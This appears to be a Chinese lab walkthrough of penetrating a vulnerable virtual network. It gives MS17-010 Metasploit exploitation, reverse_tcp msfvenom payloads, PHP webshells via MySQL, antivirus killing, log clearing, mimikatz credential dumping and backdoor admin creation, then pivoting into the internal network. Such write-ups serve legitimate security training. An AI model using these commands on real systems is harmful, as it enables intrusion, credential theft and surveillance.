0x01.虚拟机网络拓扑图
0x02.web外围打点,获取边界权限
1.通过对web外部靶机进行信息收集,发现存在80,445,3306等敏感信息端口
2.通过御剑扫描目录,得到敏感文件目录,其下有一个beifei.rar,phpmyadmin ,并且在192.168.0.106/phpmyadmin/ 发现数据库密码是弱口令 root root
通过beifei.rar文件中的 beifen\yxcms\protected\config.php 可以看见数据库密码
通过端口和目录文件,发现目前有两种方向可以利用,一种是利用phpmyadmin平台上传webshell,另外一种是利用445ms17-010。
3.漏洞利用
(1)ms17-010利用,详细参考链接:
1.搜索模块 search ms17-0102.判断是否存在ms17-010 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.01.06run出现下面这条语句证明存在ms17-010漏洞 Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)3.利用ms17-010漏洞use exploit/windows/smb/ms17_010_eternalblue设置set payload 攻击模块set payload windows/x64/meterpreter/reverse_tcp或者 set payload windows/x64/meterpreter/bind_tcpset rhosts 192.168.01.06run
漏洞存在截图:
漏洞利用成功截图
查看权限 getuid查询进程号 getpid进行迁移 migrate进程随机迁移 run post/windows/manage/migrate检查目标机器是否运行在虚拟机上 run post/windows/gather/checkvm关闭杀毒软件 run post/windows/manage/killav启动远程桌面 run post/windows/manage/enable_rdp获取用户密码 load kiwicreds_all清楚日志 clearev运行时间 idletime查看本地子网 run post/windows/manage/autoroute查看有多少用户登录 run post/windows/gather/enum_logged_on_users列举安装目标机上的应用程序 run post/windows/gather/enum_applications抓取目标机屏幕截图 load espia screengrab查看是否有摄像头 webcam_list打开摄像头拍一张照片 webcam_snap打开直播模式 webcam_stream搜索文件 search -f *.txt -d c:\:下载文件 download c:\test /root上传文件 upload /root/test.txt c:\:
关闭杀软截图:
获取密码截图:
开始3389截图:
方法二:利用phpmyadmin上传webshell获取权限
(1)利用sql语句进行文件写入
前提条件
3.1.mysql允许文件导出
secure_file_priv = NULL #表示不允许
secure_file_priv = 空或者/ #表示没有限制
secure_file_priv = 具体目录 /tmp #表示只允许在/tmp目录下
secure_file_priv 只能在mysql的配置文件中修改
测试语句
show variables like 'secure_file_priv'
select "<?php eval($_POST[cmd]);?>" into outfile "C:/phpStudy/PHPTutorial/WWW/shell.php"
表示不能导入导出
3.2.日志getshell
#查看日志状态SHOW VARIABLES LIKE "%general%"#启用日志set global general_log =on #改变日志路径set global general_log_file='C:/phpStudy/PHPTutorial/WWW/log.php'#写入一句话select '<?php @eval($_POST[123])?>;'
查看日志状态
启动日志和改变日志路径
写入一句话
3.利用特定的版本文件包含漏洞
用蚁剑链接已经上传成功的码
获取主机权限信息收集
systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞net start查看启动进程,可以根据启动进程判断主机在域中扮演的角色tasklist查看进程列表netstat -ano 查看端口开放情况net view /domain 判断是否存在域ipconfig /all 查看主机名、域DNS、IPnet view 查看域内主机 net time /domain 域内主机以域服务器时间为准,故该命令可用于判断DCnslookup 域名查看IPnet config workstation 查看登录信息whoami /all 查看用户信息net user /domain 查看域内用户,可以将其作为字典,对其他主机的密码进行爆破for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL=" 探针域内存活主机
whoami /all查看权限,该权限为最高管理员权限
创建一个用户并把这个用户加入到管理员组中
net user hacker qwe123!@# /add 创建用户net localgroup administrators hacker /add 将创建的用户添加到administrators组中
查看防火墙状态和关闭防火墙
netsh advfirewall show allprofile state 查看防火墙的当前状态netsh advfirewall set allprofile state off 关闭防火墙
打开3389端口进行远程登陆
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
4.远程登陆到边缘设备
5.上次mimikatz抓取密码
#管理员启动privilege::debugsekurlsa::logonPasswords
0x03.内网渗透
1.做代理ew和proxy
在边界服务器上上穿ew代理socks5
ew_for_windows.exe -s ssocksd -l 8000
采用ew套接字代理,服务器上运行准备好的ew_for_windows.exe,本地使用proxifier配置如下:
代理规则配置如上,可以根据情况具体配置,以上是Windows端的配置,但是渗透难免会用到kali,所以kali也需要配置:
vi /etc/proxychains4.conf #修改如图下面即可
修改后的截图:
代理成功截图
2.msf做代理
利用msf生成马儿让目标运行,反弹回来meterpreter查看路由添加路由,然后msf就可以访问内网,可以使用msf来探测以及渗透测试。
(1)生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
把生成的666.exe上传到边缘靶机中即192.168.0.106机器中,然后点击运行
(2)kali监听端口
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.102set lport 4444run
添加路由
第一步:run get_local_subnets (获取当前路由)第二步: run autoroute -s 192.168.52.0/24 (添加路由)第三步: run autoroute -p (查看已添加路由)
攻击pyload
第一步:background(转换到后台)
第二步:use auxiliary/scanner/smb/smb_ms17_010
3.内网渗透:
3.1内网信息收集
(1).将fscan上传到边缘机器上进行内网扫描fscan
扫描出来的内网资产以及端口
3.2漏洞利用
对内网两台主机进行ms17-010漏洞利用
对内网主机192.168.52.138
显示内网其原因是有其他的安全防护
对主机192.168.52.139进行ms17-010漏洞利用同样也是具有其他的安全防护
